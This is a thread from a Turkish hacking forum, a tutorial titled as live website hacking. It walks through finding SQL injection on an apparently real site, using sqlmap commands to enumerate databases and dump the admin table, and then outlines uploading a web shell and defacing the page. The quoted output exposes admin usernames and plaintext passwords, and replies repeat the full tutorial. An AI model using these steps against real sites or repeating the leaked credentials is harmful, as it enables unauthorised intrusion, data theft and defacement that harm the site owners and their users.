Canlı Canlı Website Hackleme ,Shell Upload Etme ve Index Atma.

operatorx · 22 Şub 2023

PanchiaNN' Alıntı:
Detaylı ve açıklayıcı olmuş. Fakat resimler gözükmüyor benle mi alakalı makale ile mi anlamadım.

Bendede öyle hocam makalede sorun var yüksek ihtimalle

Wodenn · 22 Şub 2023

PanchiaNN' Alıntı:
Detaylı ve açıklayıcı olmuş. Fakat resimler gözükmüyor benle mi alakalı makale ile mi anlamadım.

operatorx' Alıntı:
Bendede öyle hocam makalede sorun var yüksek ihtimalle

resimi upload etdigim siteden kaynakli kusura bakmayin

operatorx · 22 Şub 2023

Wodenn' Alıntı:
resimi upload etdigim siteden kaynakli kusura

Wodenn' Alıntı:
resimi upload etdigim siteden kaynakli kusura bakmayin

Esağfirullah hocam, resimleri güncelleme imkanınız var mı acaba hocam

BlckFlx · 22 Şub 2023

Wodenn' Alıntı:
Merhabalar TurkHackTeam ailesi bu konuda Sql zafiyeti kullanarak site admin paneline erişdikten sonra shell upload ve index atmayı görsel olarak göstermek istiyorum.
Konu içinde bazı ipuçları bulmanız mümkün.Dikkatli okursanız sizde maksimum faydalana bilirsiniz.

PART 1 -ZAFİYET KEŞFİ
Site oncesi:

BİR SİTEDE SQL AÇIĞI ARIYORSAK GENEL OLARAK YAPILAN İLK ŞEY SİTEDEKİ HERHANGİ BİR İD DEĞERİNİN SONUNA TIRNAK İŞARETİ EKLEMEKTİR
TIRNAK İŞARETİ ATDIKTAN SONRASI

TIRNAK İŞARETİ EKLEDİKDEN SONRA SİTEDE VERİ KAYBI OLUYORSA,HERHANGİ BİR HATA VERİYORSA,YAZILAR TAMAMEN YOK OLUYORSA VE YA HER HANGİ DEĞİŞİK TÜRDEN YAZILAR ÇIKIYORSA ORADA BÜYÜK İHTİMAL SQL ZAFİYETİ BULUNMAKTADIR.

Yeni arkadaşlar için temel düzeyde anlatmak istediğim için sizlere şimdi bu açığı manual değilde sqlmap kullanarak nasıl istismar edeceğimizi gösteriyorum.

PART 2 -TOOL KULLANARAK AÇIKTAN FAYDALANMAK

sqlmap -u "CRIME & SEXUAL BEHAVIOUR AWARENESS PROGRAM" --random-agent --dbs --batch

available databases [15]:
[*] cmc_erp
[*] cmc_marine
[*] dgs_cdac
[*] freshnaroma
[*] gpsdirectory
[*] imu
[*] information_schema
[*] maritimeknowledge
[*] mmct_marine
[*] mysql
[*] online_examination
[*] performance_schema
[*] sunav
[*] survey
[*] virtualguru

sqlmap -u "CRIME & SEXUAL BEHAVIOUR AWARENESS PROGRAM" -D cmc_erp --tables

Database: cmc_erp
[21 tables]
+-------------------------+
| batch_strength |
| category |
| cmc_academic_sms_log |
| cmc_academic_year |
| cmc_adminuser |
| cmc_admission_team |
| cmc_agent_register |
| cmc_announcements |
| cmc_application |
| cmc_asset_in |
| cmc_asset_inward |
| cmc_asset_log |
| cmc_asset_master |
| cmc_asset_outward |
| cmc_assign_task |
| cmc_attendance |
| cmc_attendance_cron |
| cmc_authorization |
| cmc_bank_inflow |
| cmc_bank_openingbalance |
| cmc_bank_outflow |
+-------------------------+

sqlmap -u "Diwali Celebrations at CMC" --random-agent -D cmc_erp -T cmc_adminuser --columns

Database: cmc_erp
Table: cmc_adminuser
[11 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| email | varchar(50) |
| first_name | varchar(50) |
| id | bigint(20) |
| lastname | varchar(50) |
| mobile_no | varchar(20) |
| password | varchar(20) |
| reference_no | varchar(50) |
| status | int(1) |
| unit | varchar(250) |
| user_group | varchar(50) |
| username | varchar(50) |
+--------------+--------------+

sqlmap -u "Diwali Celebrations at CMC" --random-agent -D cmc_erp -T cmc_adminuser -C username,password --dump

Database: cmc_erp
Table: cmc_adminuser
[4 entries]
+--------------------------+--------------+
| username | password |
+--------------------------+--------------+
| admin | mtech!@adm12 |
| [email protected] | 4222364900 |
| [email protected] | 4222612200 |
| [email protected] | 9894993164 |

+--------------------------+--------------+

GORDUGUNUZ UZERE SİTEDEKİ ADMİN BİLGİLERİNİ SQLMAP KULLANARAK BULDUK
ŞİMDİ SİZLERE BİR SİTENİN ADMİN VE YA LOGİN TARZI PANEL İSMİ YOKSA NASIL PANELİ BULURUZ

ONU GÖSTEREYİM.

CTRL C YAPIN VE SİTE DİZİNLERİNİ GEZİN

GÖRDÜĞÜNÜZ ÜZERE BURADA SİTENİN ADMİN PANELİNE ULAŞACAĞIMIZ LİNKİ BULDUK ŞİMDİ SQLMAP KULLANARAK BULDUĞUMUZ
ADMİN PANEL USER PASSLA PANELE GİRİYORUZ.

PART 3 - SHELL VE INDEX ATMA
ILK OLARAK ADMIN PANELINI GEZIN VE RESIM PDF VE YA DIGER DOSYA TURLERINI UPLOAD EDECEGINIZ BIR YOL BULUN

ARKADASLAR GORDUGUNUZ UZERE BULDUK VE
UPLOAD ETDIK SIMDI SHELL DIZININE GIDELIM

BUNDAN SONRASI SİZE KALMIŞ .AMACIMIZ SADECE GÖSTERMEK OLDUĞU
İÇİN UFAK BİR UYARI.HTML BIRAKARAK KONUMUZU SONLANDIRIYORUM.

fotoğraflar yok bende "image not found" diyor

umut.rht · 23 Şub 2023

ACE Veen · 13 Mar 2023

Wodenn' Alıntı:
Merhabalar TurkHackTeam ailesi bu konuda Sql zafiyeti kullanarak site admin paneline erişdikten sonra shell upload ve index atmayı görsel olarak göstermek istiyorum.
Konu içinde bazı ipuçları bulmanız mümkün.Dikkatli okursanız sizde maksimum faydalana bilirsiniz.

PART 1 -ZAFİYET KEŞFİ
Site oncesi:

BİR SİTEDE SQL AÇIĞI ARIYORSAK GENEL OLARAK YAPILAN İLK ŞEY SİTEDEKİ HERHANGİ BİR İD DEĞERİNİN SONUNA TIRNAK İŞARETİ EKLEMEKTİR
TIRNAK İŞARETİ ATDIKTAN SONRASI

TIRNAK İŞARETİ EKLEDİKDEN SONRA SİTEDE VERİ KAYBI OLUYORSA,HERHANGİ BİR HATA VERİYORSA,YAZILAR TAMAMEN YOK OLUYORSA VE YA HER HANGİ DEĞİŞİK TÜRDEN YAZILAR ÇIKIYORSA ORADA BÜYÜK İHTİMAL SQL ZAFİYETİ BULUNMAKTADIR.

Yeni arkadaşlar için temel düzeyde anlatmak istediğim için sizlere şimdi bu açığı manual değilde sqlmap kullanarak nasıl istismar edeceğimizi gösteriyorum.

PART 2 -TOOL KULLANARAK AÇIKTAN FAYDALANMAK

sqlmap -u "CRIME & SEXUAL BEHAVIOUR AWARENESS PROGRAM" --random-agent --dbs --batch

available databases [15]:
[*] cmc_erp
[*] cmc_marine
[*] dgs_cdac
[*] freshnaroma
[*] gpsdirectory
[*] imu
[*] information_schema
[*] maritimeknowledge
[*] mmct_marine
[*] mysql
[*] online_examination
[*] performance_schema
[*] sunav
[*] survey
[*] virtualguru

sqlmap -u "CRIME & SEXUAL BEHAVIOUR AWARENESS PROGRAM" -D cmc_erp --tables

Database: cmc_erp
[21 tables]
+-------------------------+
| batch_strength |
| category |
| cmc_academic_sms_log |
| cmc_academic_year |
| cmc_adminuser |
| cmc_admission_team |
| cmc_agent_register |
| cmc_announcements |
| cmc_application |
| cmc_asset_in |
| cmc_asset_inward |
| cmc_asset_log |
| cmc_asset_master |
| cmc_asset_outward |
| cmc_assign_task |
| cmc_attendance |
| cmc_attendance_cron |
| cmc_authorization |
| cmc_bank_inflow |
| cmc_bank_openingbalance |
| cmc_bank_outflow |
+-------------------------+

sqlmap -u "Diwali Celebrations at CMC" --random-agent -D cmc_erp -T cmc_adminuser --columns

Database: cmc_erp
Table: cmc_adminuser
[11 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| email | varchar(50) |
| first_name | varchar(50) |
| id | bigint(20) |
| lastname | varchar(50) |
| mobile_no | varchar(20) |
| password | varchar(20) |
| reference_no | varchar(50) |
| status | int(1) |
| unit | varchar(250) |
| user_group | varchar(50) |
| username | varchar(50) |
+--------------+--------------+

sqlmap -u "Diwali Celebrations at CMC" --random-agent -D cmc_erp -T cmc_adminuser -C username,password --dump

Database: cmc_erp
Table: cmc_adminuser
[4 entries]
+--------------------------+--------------+
| username | password |
+--------------------------+--------------+
| admin | mtech!@adm12 |
| [email protected] | 4222364900 |
| [email protected] | 4222612200 |
| [email protected] | 9894993164 |

+--------------------------+--------------+

GORDUGUNUZ UZERE SİTEDEKİ ADMİN BİLGİLERİNİ SQLMAP KULLANARAK BULDUK
ŞİMDİ SİZLERE BİR SİTENİN ADMİN VE YA LOGİN TARZI PANEL İSMİ YOKSA NASIL PANELİ BULURUZ

ONU GÖSTEREYİM.

CTRL C YAPIN VE SİTE DİZİNLERİNİ GEZİN

GÖRDÜĞÜNÜZ ÜZERE BURADA SİTENİN ADMİN PANELİNE ULAŞACAĞIMIZ LİNKİ BULDUK ŞİMDİ SQLMAP KULLANARAK BULDUĞUMUZ
ADMİN PANEL USER PASSLA PANELE GİRİYORUZ.

PART 3 - SHELL VE INDEX ATMA
ILK OLARAK ADMIN PANELINI GEZIN VE RESIM PDF VE YA DIGER DOSYA TURLERINI UPLOAD EDECEGINIZ BIR YOL BULUN

ARKADASLAR GORDUGUNUZ UZERE BULDUK VE
UPLOAD ETDIK SIMDI SHELL DIZININE GIDELIM

BUNDAN SONRASI SİZE KALMIŞ .AMACIMIZ SADECE GÖSTERMEK OLDUĞU
İÇİN UFAK BİR UYARI.HTML BIRAKARAK KONUMUZU SONLANDIRIYORUM.

eline sağlık

Canlı Canlı Website Hackleme ,Shell Upload Etme ve Index Atma.

operatorx

Üye

Wodenn

Üye

operatorx

Üye

BlckFlx

Yeni üye

umut.rht

Yeni üye

ACE Veen

Uzman üye

Sosyal medya sayfalarımız